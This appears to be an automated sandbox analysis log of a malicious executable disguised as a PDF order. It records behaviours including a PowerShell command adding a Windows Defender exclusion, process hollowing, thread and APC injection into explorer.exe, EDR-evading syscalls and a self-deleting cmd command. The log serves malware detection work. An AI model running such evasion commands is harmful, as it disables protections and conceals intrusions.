Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C89B3 mov eax, dword ptr fs:[00000030h]	4_2_011C89B3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C89B3 mov eax, dword ptr fs:[00000030h]	4_2_011C89B3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0 mov eax, dword ptr fs:[00000030h]	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011409AD mov eax, dword ptr fs:[00000030h]	4_2_011409AD
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011409AD mov eax, dword ptr fs:[00000030h]	4_2_011409AD
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0114A9D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0114A9D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0114A9D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0114A9D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0114A9D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0114A9D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011749D0 mov eax, dword ptr fs:[00000030h]	4_2_011749D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D69C0 mov eax, dword ptr fs:[00000030h]	4_2_011D69C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011729F9 mov eax, dword ptr fs:[00000030h]	4_2_011729F9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011729F9 mov eax, dword ptr fs:[00000030h]	4_2_011729F9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120A9D3 mov eax, dword ptr fs:[00000030h]	4_2_0120A9D3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CE9E0 mov eax, dword ptr fs:[00000030h]	4_2_011CE9E0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CC810 mov eax, dword ptr fs:[00000030h]	4_2_011CC810
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]	4_2_01162835
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]	4_2_01162835
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]	4_2_01162835
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01162835 mov ecx, dword ptr fs:[00000030h]	4_2_01162835
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]	4_2_01162835
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01162835 mov eax, dword ptr fs:[00000030h]	4_2_01162835
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E483A mov eax, dword ptr fs:[00000030h]	4_2_011E483A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E483A mov eax, dword ptr fs:[00000030h]	4_2_011E483A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A830 mov eax, dword ptr fs:[00000030h]	4_2_0117A830
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01170854 mov eax, dword ptr fs:[00000030h]	4_2_01170854
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01144859 mov eax, dword ptr fs:[00000030h]	4_2_01144859
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01144859 mov eax, dword ptr fs:[00000030h]	4_2_01144859
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01152840 mov ecx, dword ptr fs:[00000030h]	4_2_01152840
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D6870 mov eax, dword ptr fs:[00000030h]	4_2_011D6870
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D6870 mov eax, dword ptr fs:[00000030h]	4_2_011D6870
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CE872 mov eax, dword ptr fs:[00000030h]	4_2_011CE872
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CE872 mov eax, dword ptr fs:[00000030h]	4_2_011CE872
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CC89D mov eax, dword ptr fs:[00000030h]	4_2_011CC89D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140887 mov eax, dword ptr fs:[00000030h]	4_2_01140887
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120A8E4 mov eax, dword ptr fs:[00000030h]	4_2_0120A8E4
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E8C0 mov eax, dword ptr fs:[00000030h]	4_2_0116E8C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012108C0 mov eax, dword ptr fs:[00000030h]	4_2_012108C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0117C8F9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0117C8F9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BEB1D mov eax, dword ptr fs:[00000030h]	4_2_011BEB1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01208B28 mov eax, dword ptr fs:[00000030h]	4_2_01208B28
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01208B28 mov eax, dword ptr fs:[00000030h]	4_2_01208B28
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116EB20 mov eax, dword ptr fs:[00000030h]	4_2_0116EB20
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116EB20 mov eax, dword ptr fs:[00000030h]	4_2_0116EB20
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EEB50 mov eax, dword ptr fs:[00000030h]	4_2_011EEB50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F4B4B mov eax, dword ptr fs:[00000030h]	4_2_011F4B4B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F4B4B mov eax, dword ptr fs:[00000030h]	4_2_011F4B4B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E8B42 mov eax, dword ptr fs:[00000030h]	4_2_011E8B42
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D6B40 mov eax, dword ptr fs:[00000030h]	4_2_011D6B40
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D6B40 mov eax, dword ptr fs:[00000030h]	4_2_011D6B40
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120AB40 mov eax, dword ptr fs:[00000030h]	4_2_0120AB40
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113CB7E mov eax, dword ptr fs:[00000030h]	4_2_0113CB7E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150BBE mov eax, dword ptr fs:[00000030h]	4_2_01150BBE
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150BBE mov eax, dword ptr fs:[00000030h]	4_2_01150BBE
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F4BB0 mov eax, dword ptr fs:[00000030h]	4_2_011F4BB0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F4BB0 mov eax, dword ptr fs:[00000030h]	4_2_011F4BB0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EEBD0 mov eax, dword ptr fs:[00000030h]	4_2_011EEBD0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140BCD mov eax, dword ptr fs:[00000030h]	4_2_01140BCD
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140BCD mov eax, dword ptr fs:[00000030h]	4_2_01140BCD
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140BCD mov eax, dword ptr fs:[00000030h]	4_2_01140BCD
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01160BCB mov eax, dword ptr fs:[00000030h]	4_2_01160BCB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01160BCB mov eax, dword ptr fs:[00000030h]	4_2_01160BCB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01160BCB mov eax, dword ptr fs:[00000030h]	4_2_01160BCB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01148BF0 mov eax, dword ptr fs:[00000030h]	4_2_01148BF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01148BF0 mov eax, dword ptr fs:[00000030h]	4_2_01148BF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01148BF0 mov eax, dword ptr fs:[00000030h]	4_2_01148BF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116EBFC mov eax, dword ptr fs:[00000030h]	4_2_0116EBFC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CCBF0 mov eax, dword ptr fs:[00000030h]	4_2_011CCBF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CCA11 mov eax, dword ptr fs:[00000030h]	4_2_011CCA11
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01164A35 mov eax, dword ptr fs:[00000030h]	4_2_01164A35
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01164A35 mov eax, dword ptr fs:[00000030h]	4_2_01164A35
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117CA38 mov eax, dword ptr fs:[00000030h]	4_2_0117CA38
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117CA24 mov eax, dword ptr fs:[00000030h]	4_2_0117CA24
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116EA2E mov eax, dword ptr fs:[00000030h]	4_2_0116EA2E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]	4_2_01146A50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]	4_2_01146A50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]	4_2_01146A50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]	4_2_01146A50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]	4_2_01146A50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]	4_2_01146A50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146A50 mov eax, dword ptr fs:[00000030h]	4_2_01146A50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150A5B mov eax, dword ptr fs:[00000030h]	4_2_01150A5B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150A5B mov eax, dword ptr fs:[00000030h]	4_2_01150A5B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BCA72 mov eax, dword ptr fs:[00000030h]	4_2_011BCA72
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BCA72 mov eax, dword ptr fs:[00000030h]	4_2_011BCA72
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117CA6F mov eax, dword ptr fs:[00000030h]	4_2_0117CA6F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117CA6F mov eax, dword ptr fs:[00000030h]	4_2_0117CA6F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117CA6F mov eax, dword ptr fs:[00000030h]	4_2_0117CA6F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EEA60 mov eax, dword ptr fs:[00000030h]	4_2_011EEA60
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01178A90 mov edx, dword ptr fs:[00000030h]	4_2_01178A90
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01214A80 mov eax, dword ptr fs:[00000030h]	4_2_01214A80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01148AA0 mov eax, dword ptr fs:[00000030h]	4_2_01148AA0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01148AA0 mov eax, dword ptr fs:[00000030h]	4_2_01148AA0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01196AA4 mov eax, dword ptr fs:[00000030h]	4_2_01196AA4
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140AD0 mov eax, dword ptr fs:[00000030h]	4_2_01140AD0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01174AD0 mov eax, dword ptr fs:[00000030h]	4_2_01174AD0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01174AD0 mov eax, dword ptr fs:[00000030h]	4_2_01174AD0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01196ACC mov eax, dword ptr fs:[00000030h]	4_2_01196ACC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01196ACC mov eax, dword ptr fs:[00000030h]	4_2_01196ACC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01196ACC mov eax, dword ptr fs:[00000030h]	4_2_01196ACC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117AAEE mov eax, dword ptr fs:[00000030h]	4_2_0117AAEE
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117AAEE mov eax, dword ptr fs:[00000030h]	4_2_0117AAEE
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01136D10 mov eax, dword ptr fs:[00000030h]	4_2_01136D10
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01136D10 mov eax, dword ptr fs:[00000030h]	4_2_01136D10
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01136D10 mov eax, dword ptr fs:[00000030h]	4_2_01136D10
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01174D1D mov eax, dword ptr fs:[00000030h]	4_2_01174D1D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F8D10 mov eax, dword ptr fs:[00000030h]	4_2_011F8D10
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F8D10 mov eax, dword ptr fs:[00000030h]	4_2_011F8D10

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_00A048B7 GetLastError,SetLastError,GetProcessHeap,HeapFree,

8_2_00A048B7

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00A061C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		8_2_00A061C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00A06510 SetUnhandledExceptionFilter,		8_2_00A06510

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	NtQueueApcThread: Indirect: 0x10BA4F2			Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	NtClose: Indirect: 0x10BA56C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Memory written: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Thread register set: target process: 1028			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 1028			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: A00000

Jump to behavior

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process created: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"	Jump to behavior

Source: explorer.exe, 00000006.00000002.4546921012.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876221001.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000006.00000000.2105059871.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4541175714.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2105059871.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4543100345.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4541175714.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2105059871.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4541175714.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2105059871.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4541175714.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000002.4540391524.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2104403018.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Queries volume information: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
